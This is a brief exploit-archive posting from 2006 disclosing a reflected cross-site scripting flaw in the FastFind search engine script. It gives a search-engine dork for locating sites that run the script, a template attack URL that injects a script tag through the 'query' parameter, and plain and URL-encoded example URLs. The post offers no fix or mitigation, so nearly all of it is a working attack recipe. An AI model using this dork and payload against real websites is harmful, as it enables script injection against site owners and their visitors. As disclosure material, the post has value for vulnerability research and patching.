Home / os / winme

fastfind.txt

Posted on 12 October 2006

XSS IN FastFind... DORK: "Powered by FastFind - Search Engine Script" Exploit: http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple references: http://www.interspire.com/fastfind/ Example: http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple

 

TOP